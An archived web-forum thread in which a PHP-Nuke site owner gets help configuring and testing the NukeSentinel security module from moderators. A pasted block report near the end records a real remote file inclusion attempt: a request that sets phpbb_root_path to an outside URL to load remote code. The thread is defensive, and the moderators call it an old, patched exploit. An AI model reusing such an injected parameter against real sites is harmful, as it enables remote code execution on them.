Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x
Author Message
doffer83
Worker
Worker


Joined: Apr 17, 2011
Posts: 117
Location: Amsterdam

PostPosted: Sat Oct 27, 2012 1:50 am Reply with quote

can someone explaine to me what to do with this option.. I mean what does it do and if I need to it change the setting inside it...

I am looking for a manual for Nukesentinel configuration..

this page
Only registered users can see links on this board! Get registered or login!

does't load the menu good with crome and IE.. I can't click on the right url...
 
View user's profile Send private message Visit poster's website
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Sun Oct 28, 2012 9:26 am Reply with quote

When you go to NukeSentinel administration, what version does it show? Should be 2.6.03 I believe.

Next check the overall Nukesentinel admin settings. Do you have the "admin auth" turned on? This provides an additional check when someone tries to access your admin screens. It may not be needed. See if turning it off fixes your problem.

Also, please let us know exactly where the problem is occurring. Is it when you go to scan for new admins? Or where? Does it work properly with Firefox but not Chrome and IE? When you say that you can't click on the "right url" which one are you referring to?
 
View user's profile Send private message Visit poster's website
doffer83
PostPosted: Sun Oct 28, 2012 10:28 am Reply with quote

I mean the menu in the header in the next page
Only registered users can see links on this board! Get registered or login!

Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login!

I wanna configure sentinel and test it... that's why I was looking for the faq page
 
fkelly
PostPosted: Sun Oct 28, 2012 1:38 pm Reply with quote

Sorry, I didn't understand your question at first. Now I do, but I don't have any good news. I ran that page through the W3C validator and there are many, many errors (over 200). I am sure the FAQ has not been maintained in years and I doubt that it is even current with the latest NS changes. The author of NS has moved on and keeping the FAQ up to date is a task that I doubt anyone will take on.

If you have specific questions about NukeSentinel you can post them here and we'll try to help as best we can.
 
doffer83
PostPosted: Sun Oct 28, 2012 2:20 pm Reply with quote

after installation the sentinel without any troubles.. I have changed some options to turn it on. I want know if it does protect the nuke site ... is there any test method?

I just don't want use the admin protection via .htaccess... do I really need it?
 
neralex
The Mouse Is Extension Of Arm


Joined: Aug 22, 2007
Posts: 1296
Location: Germany

PostPosted: Sun Oct 28, 2012 2:23 pm Reply with quote

Here the link to the AuthList FAQ: Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
fkelly
PostPosted: Sun Oct 28, 2012 3:49 pm Reply with quote

You don't need admin protection ... it's just an option. Most of the protections in NS are just that: options. For a test method you'd need to duplicate a hack and see. We won't be posting hacks here.

Assuming that you have Nuke Sentinel running on a live site, you will see what it is doing pretty quickly. Basically, hackers are constantly probing ALL live sites and you will quickly start to see blocked IP's get posted (and you will get emails at your admin ID reflecting that). You can also look at blocked IP's with IP tracking. And you can look at all activity on your site using IP tracking too. One of the good ways to get familiar with what's going on is to go through the IP tracking screens periodically and just look at what users are doing and how. You'll see a constant stream of them trying, for instance, to post to your forums even if they don't have usernames. I assume that you don't let anonymous post and require admin approval of new usernames.
 
doffer83
PostPosted: Mon Oct 29, 2012 3:59 am Reply with quote

Very Happy
Quote:

Created By: NukeSentinel(tm) 2.6.02
Date & Time: 2012-10-29 02:52:55 CET GMT +0100 Blocked IP: 94.142.130.149 User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
Referer: on site
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 WebMoney Advisor
HTTP Host: mysite.nl/....


I recived in my box..

I only dont know what to do now... I don't see any blocked ip yet.
 
fkelly
PostPosted: Mon Oct 29, 2012 8:06 am Reply with quote

Go to the blocked IP choice on your NukeSentinel screen and display blocked IP's. If you have Cpanel or similar access you can also look at the .htaccess file in your nukeroot directory and see if the blocked IP address has been added.

You might also want to look in the IP tracking setting in your general Sentinel admin screen and assure that it's turned on. If so, you can go to the IP tracking menu and look at what's going on by displaying tracked IP's or tracked users. Sometimes tracked users is the better choice because you can easily see what anonymous is doing. Usually that's where the hacks come from.
 
doffer83
PostPosted: Mon Oct 29, 2012 9:21 am Reply with quote

@fkelly.. Yep I know this info. great options and possibiliets . but there is no ip added to the db or even to the .httacces

.htaccess has 666 rights


I wanna thank you all for the information.. I think it is okey like now. thumbs up
 
fkelly
PostPosted: Mon Oct 29, 2012 9:26 am Reply with quote

You are welcome. Check your path to htaccess in your NS administration screen. If that's not right you won't be able to write there. I'm not sure, but an error in writing there could cause the database write to not happen also. Your logs should show any errors.

Privileges on htaccess should not be the issue. Mine are 644 and it works fine. But the path has to be correct.
 
doffer83
PostPosted: Tue Nov 13, 2012 6:48 am Reply with quote

fkelly wrote:
You are welcome. Check your path to htaccess in your NS administration screen. If that's not right you won't be able to write there. I'm not sure, but an error in writing there could cause the database write to not happen also. Your logs should show any errors.

Privileges on htaccess should not be the issue. Mine are 644 and it works fine. But the path has to be correct.


I recive almost every dag a mail... I do worry about somthing and I want share it with you for advice

Code:


Created By: NukeSentinel(tm) 2.6.02
Date & Time: 2012-11-13 12:31:24 CET GMT +0100 Blocked IP: 202.152.221.9 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/4.61 [en] (OS/2; U)
HTTP Host: mysite.nl
Script Name: /modules/Forums/admin/admin_db_utilities.php
Query String: phpbb_root_path=http://mediapluss.info/wp-includes/images/crystal/t??
Get String: phpbb_root_path=http://mediapluss.info/wp-includes/images/crystal/t?
?
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 202.152.221.9
Remote Port: 3605
Request Method: GET



is this a hacker ? it has been blocked I can see
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Sat Nov 17, 2012 9:45 am Reply with quote

Yes, this is a hack attempt. Pretty sure a very old exploit that has long since been patched.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©